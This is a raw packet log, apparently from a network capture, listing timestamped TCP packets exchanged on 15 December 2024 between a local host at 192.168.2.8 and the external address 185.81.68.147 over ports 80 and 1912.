                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.063667059 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.063740015 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.067440987 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.067573071 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.067756891 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.075833082 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.109462976 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.118592024 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.135015011 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.135256052 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.135324955 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.139210939 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.139309883 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.139385939 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.147648096 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.147737026 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.147820950 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.156080961 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.156111956 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.156196117 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.164383888 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.164504051 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.164586067 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.172825098 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.172883034 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.172945023 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.181164980 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.181221962 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.181289911 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.189708948 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.189861059 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.190061092 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.197987080 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.198160887 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.198249102 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.206355095 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.206449032 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.206588984 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.213664055 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.213814974 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.213877916 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.229191065 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.238353014 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.238384008 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.238435984 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.326982975 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.327090979 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.327559948 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.329160929 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.329265118 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.329318047 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.332612991 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.332806110 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.332863092 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.337091923 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.337236881 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.337467909 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.341605902 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.341651917 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.341712952 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.346080065 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.346193075 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.346240997 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.350560904 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.350636959 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.350686073 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.355309963 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.355674982 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.355799913 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.359504938 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.359625101 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.359776974 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.364088058 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.364247084 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.364305973 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.368375063 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.368469000 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.368535995 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.372801065 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.372977018 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.373048067 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.377258062 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.377336979 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.378297091 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.381696939 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.381830931 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.381875992 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.386173010 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.386317015 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.386384964 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.390678883 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.390774012 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.390834093 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.395248890 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.395303965 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.395363092 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.399552107 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.399713039 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.400041103 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.404138088 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.404215097 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.404289007 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.408516884 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.408607006 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.408675909 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.412903070 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.412985086 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.413038015 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.417310953 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.417388916 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.417447090 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.421798944 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.421890974 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.421950102 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.519390106 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.519447088 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.519510984 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.521015882 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.521135092 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.521831036 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.524138927 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.524246931 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.525149107 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.527407885 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.527507067 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.527563095 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.530591011 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.530622959 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.530688047 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.533668041 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.533767939 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.533819914 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.536838055 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.536946058 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.538794041 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.539684057 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.539828062 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.542323112 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.543009043 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.543042898 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.543055058 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.543107033 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.545599937 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.545686960 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.545706987 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.545753002 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.548363924 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.548440933 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.548499107 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.551184893 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.551274061 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.551321030 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.554053068 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.554229975 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.554344893 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.556742907 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.556859970 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.557066917 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.559469938 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.559602022 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.559799910 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.562283993 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.562617064 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.562673092 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.565068960 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.565141916 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.565318108 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.567926884 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.567990065 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.568047047 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.570689917 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.570887089 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.570945024 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.573467970 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.573591948 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.573647976 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.576270103 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.576339006 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.576390028 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.579128981 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.579173088 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.579224110 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.581906080 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.581938982 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.581986904 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.584650040 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.584733963 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.584779024 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.587443113 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.587523937 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.587578058 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.590225935 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.590331078 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.590454102 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.593048096 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.593092918 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.593139887 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.595845938 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.595953941 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.596019983 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.598633051 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.598757029 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.598810911 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.601409912 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.601521969 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.601567984 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.604234934 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.604321003 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.604367018 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.607069016 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.607347965 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.608123064 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.609795094 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.609857082 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.609921932 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.612533092 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.612586975 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.612653971 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.615565062 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.615586996 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.615639925 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.618129015 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.665198088 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.665519953 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.711265087 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.711365938 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.711425066 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.712620020 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.712815046 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.712863922 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.714605093 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.714775085 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.714832067 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.716865063 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.716928959 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.717071056 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.719109058 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.719202995 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.720345974 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.721318007 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.721420050 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.721504927 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.723481894 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.723578930 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.723670006 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.725617886 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.725785971 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.726509094 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.727771044 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.727958918 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.728010893 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.729981899 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.730051994 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.730303049 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.731884956 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.731977940 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.732023954 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.733937979 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.734060049 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.734211922 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.735944033 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.736037016 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.736156940 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.737914085 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.738033056 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.738085032 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.739872932 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.740008116 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.740098953 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.741820097 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.742039919 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.742100000 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.743788958 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.743916035 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.744107962 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.745692968 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.745806932 CET8049713185.81.68.147192.168.2.8
